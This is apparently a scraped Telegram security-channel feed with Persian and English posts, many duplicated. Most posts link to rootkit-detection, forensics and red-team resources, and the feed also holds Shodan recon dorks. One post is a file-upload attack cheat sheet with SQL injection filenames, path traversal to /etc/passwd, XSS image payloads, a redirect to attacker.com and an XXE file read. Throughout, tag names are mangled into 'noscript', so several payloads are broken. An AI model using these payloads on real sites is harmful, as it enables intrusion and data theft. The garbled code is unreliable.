⭕️این ابزار که جهت شناسایی و بررسی RootKit ها توسعه داده شده است، با استفاده از درایور ابزار Winpmem که خود نیز قبل تر جزو ابزار Rekall بوده است(اگر Memory Forensics کار کرده باشید احتمالا باهاش آشنا هستید) و مدتی هست بصورت جداگانه توسعه داده شده، اقدام به بررسی موارد خوبی میکند.
یکی از ویژگی هایی که میتوان به آن اشاره کرد امکان متصل کردن به سرور GDB و بررسی فایل مسیر زیر میباشد.
C:\Windows\MEMORY.DMP
خلاصه ی مواردی که این ابزار آنها را بررسی میکند :
#ThreatHunting #RootKit
@Engineer_Computer
یکی از ویژگی هایی که میتوان به آن اشاره کرد امکان متصل کردن به سرور GDB و بررسی فایل مسیر زیر میباشد.
C:\Windows\MEMORY.DMP
خلاصه ی مواردی که این ابزار آنها را بررسی میکند :
Loaded modules list
Drivers in memory code (compared to on-disk version)
Callbacks of kernel objects and internal ntoskrnl lists
PlugAndPlay tree and filters
Kernel types callbacks
FltMgr callbacks
KTimers DPC functions
IRP driver's tables
Driver signing global variables with callbacks
NDIS filters and callbacks
NetIO/FwpkCLNT filtering dispatch
Devices and their attached device objects
IDT entries
PatchGuard initialization and state
#ThreatHunting #RootKit
@Engineer_Computer
GitHub
GitHub - ExaTrack/Kdrill: Python tool to check rootkits in Windows kernel
Python tool to check rootkits in Windows kernel. Contribute to ExaTrack/Kdrill development by creating an account on GitHub.
معرفی الکساندر بورگس و وبلاگش در مورد مهندسی معکوس
https://exploitreversing.com/2024/08/07/malware-analysis-series-mas-article-08/
@Engineer_Computer
https://exploitreversing.com/2024/08/07/malware-analysis-series-mas-article-08/
@Engineer_Computer
Exploit Reversing
Malware Analysis Series (MAS): article 08 | MacOS/iOS
The eighth article (62 pages) in the Malware Analysis Series (MAS), a step-by-step malware analysis and reverse engineering series, is available for reading on: (PDF): I hope this article helps pr…
This media is not supported in your browser
VIEW IN TELEGRAM
آموزش استفاده از GPT4-o
رایگان
صدرصد
به یک فیلترشکن با ip آمریکا وصل بشید
و به لینک زیر برید
https://openai.com/index/gpt-4o-and-more-tools-to-chatgpt-free/
در شبیه سازی حملات هک بسیار مفید است
It is very useful in simulating hacking attacks
@Engineer_Computer
رایگان
صدرصد
به یک فیلترشکن با ip آمریکا وصل بشید
و به لینک زیر برید
https://openai.com/index/gpt-4o-and-more-tools-to-chatgpt-free/
در شبیه سازی حملات هک بسیار مفید است
It is very useful in simulating hacking attacks
@Engineer_Computer
👍5🎉1
گفتن اینکه حریم خصوصی بی فایده است زیرا چیزی برای پنهان کردن ندارید مانند این است که بگویید آزادی بیان بی فایده است زیرا چیزی برای گفتن ندارید
Saying that privacy is useless because you have nothing to hide is like saying that freedom of speech is useless because you have nothing to say.
@Engineer_Computer
Saying that privacy is useless because you have nothing to hide is like saying that freedom of speech is useless because you have nothing to say.
@Engineer_Computer
❤5🔥3👍1
shodan dorks for recon :
1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"
2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"
3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"
4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"
@Engineer_Computer
1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"
2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"
3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"
4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"
@Engineer_Computer
👍1
tools
OpSec
LogHunter - tool for finding user sessions by analyzing event log files through RPC (MS-EVEN)
https://github.com/CICADA8-Research/LogHunter
Info
Threat Research
API Threat Landscape
https://escape.tech/resources/api-threat-landscape
@Engineer_Computer
OpSec
LogHunter - tool for finding user sessions by analyzing event log files through RPC (MS-EVEN)
https://github.com/CICADA8-Research/LogHunter
Info
Threat Research
API Threat Landscape
https://escape.tech/resources/api-threat-landscape
@Engineer_Computer
GitHub
GitHub - CICADA8-Research/LogHunter: Opsec tool for finding user sessions by analyzing event log files through RPC (MS-EVEN)
Opsec tool for finding user sessions by analyzing event log files through RPC (MS-EVEN) - CICADA8-Research/LogHunter
DFIR
Blue Team Techniques
Hard Disk Analysis Methodology:
Training Materials
https://zach-wong.gitbook.io/easy-reads/forensics-ctf-methodology/hard-disk-analysis-methodology
@Engineer_Computer
Blue Team Techniques
Hard Disk Analysis Methodology:
Training Materials
https://zach-wong.gitbook.io/easy-reads/forensics-ctf-methodology/hard-disk-analysis-methodology
@Engineer_Computer
zach-wong.gitbook.io
Hard Disk Analysis Methodology | jigsaw@jigsaw
SOC Threat Intelligence Analyst
Telecommute/home-based, Seeking a SOC Threat Intelligence Analyst for a contract role with a State Government organization in Des Moines, IA. Kindly review and let me know if you are interested in this opportunity. Role: SOC Threat Intelligence Analyst Location: Des Moines, IA - Remote Duration: Contractual Position Summary: This position supports the organization's Security Operations Center (SOC). The purpose of this p
http://jobview.monster.com/SOC-Threat-Intelligence-Analyst-Job-US-275907401.aspx
#US #SOC Threat Intelligence Analyst
@Engineer_Computer
Telecommute/home-based, Seeking a SOC Threat Intelligence Analyst for a contract role with a State Government organization in Des Moines, IA. Kindly review and let me know if you are interested in this opportunity. Role: SOC Threat Intelligence Analyst Location: Des Moines, IA - Remote Duration: Contractual Position Summary: This position supports the organization's Security Operations Center (SOC). The purpose of this p
http://jobview.monster.com/SOC-Threat-Intelligence-Analyst-Job-US-275907401.aspx
#US #SOC Threat Intelligence Analyst
@Engineer_Computer
استفاده از درایور های آسیب پذیر ولی امضا دار برای دورزدن کنترل های امنیتی نظیر EDR
مقاله ای خواندنی 👌
https://medium.com/@merasor07/byovd-a-kernel-attack-stealthy-threat-to-endpoint-security-ec809272e505
@Engineer_Computer
مقاله ای خواندنی 👌
https://medium.com/@merasor07/byovd-a-kernel-attack-stealthy-threat-to-endpoint-security-ec809272e505
@Engineer_Computer
Medium
BYOVD A Kernel Attack: Stealthy Threat to Endpoint Security
Introduction:
tools
Red Team Tactics
PenTest and Red Teams Tools
https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations
Cyber_Education
Offensive security
SQL Injection Cheatsheet
https://tib3rius.com/sqli
@Engineer_Computer
Red Team Tactics
PenTest and Red Teams Tools
https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations
Cyber_Education
Offensive security
SQL Injection Cheatsheet
https://tib3rius.com/sqli
@Engineer_Computer
GitHub
GitHub - CyberSecurityUP/Awesome-Red-Team-Operations
Contribute to CyberSecurityUP/Awesome-Red-Team-Operations development by creating an account on GitHub.
مقاله ی صبح شنبه
دیتا مدل های کشف
کاهش خطا در تحلیل های امنیتی
**حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟
https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051
@Engineer_Computer
دیتا مدل های کشف
کاهش خطا در تحلیل های امنیتی
**حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟
https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051
@Engineer_Computer
Medium
Improving Threat Identification with Detection Modeling
In this post, I’ll present a simple approach to detection modeling and demonstrate how a Detection Data Model helps identify threats.
#موقت
Mastering of Python Script for System Administrator
Coupon : 25FC2EF9F608AA536822
Link :
https://www.udemy.com/course/mastering-of-python-noscript-for-system-administrator/?couponCode=25FC2EF9F608AA536822
@Engineer_Computer
Mastering of Python Script for System Administrator
Coupon : 25FC2EF9F608AA536822
Link :
https://www.udemy.com/course/mastering-of-python-noscript-for-system-administrator/?couponCode=25FC2EF9F608AA536822
@Engineer_Computer
🔥3
با ETW بصورت عمیق آشنا شوید
https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/
@Engineer_Computer
https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/
@Engineer_Computer
The Trail of Bits Blog
ETW internals for security research and forensics
Why has Event Tracing for Windows (ETW) become so pivotal for endpoint detection and response (EDR) solutions in Windows 10 and 11? The answer lies in the value of the intelligence it provides to security tools through secure ETW channels, which are now also…
Chaining Vulnerabilities through File Upload
SLQi
Path traversal
XSS
Open redirect
XXE
@Engineer_Computer
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"
-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>
XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>
@Engineer_Computer
⭕️ استفاده از مدلهای Large Language Models (LLMs) در کشف آسیب پذیریها به شکل چشمگیری امنیت سایبری را متحول میکند، با خودکارسازی شناسایی آسیبپذیریها، بهبود تحلیل تهدیدها. این مدلهای پیشرفته، مانند GPT-4، به طور قابل توجهی بهرهوری را با اسکن سریع کد، Generating Test Cases و ارائه گزارشهای دقیق از آسیبپذیریها بهبود میبخشند.
توانایی آنها در پردازش و تحلیل حجم عظیمی از دادهها به متخصصان امنیت کمک میکند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLMها در برنامههای Bug Bounty نه تنها شناسایی نقصهای امنیتی را تسریع میکند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت میکند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
توانایی آنها در پردازش و تحلیل حجم عظیمی از دادهها به متخصصان امنیت کمک میکند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLMها در برنامههای Bug Bounty نه تنها شناسایی نقصهای امنیتی را تسریع میکند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت میکند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
👍2❤1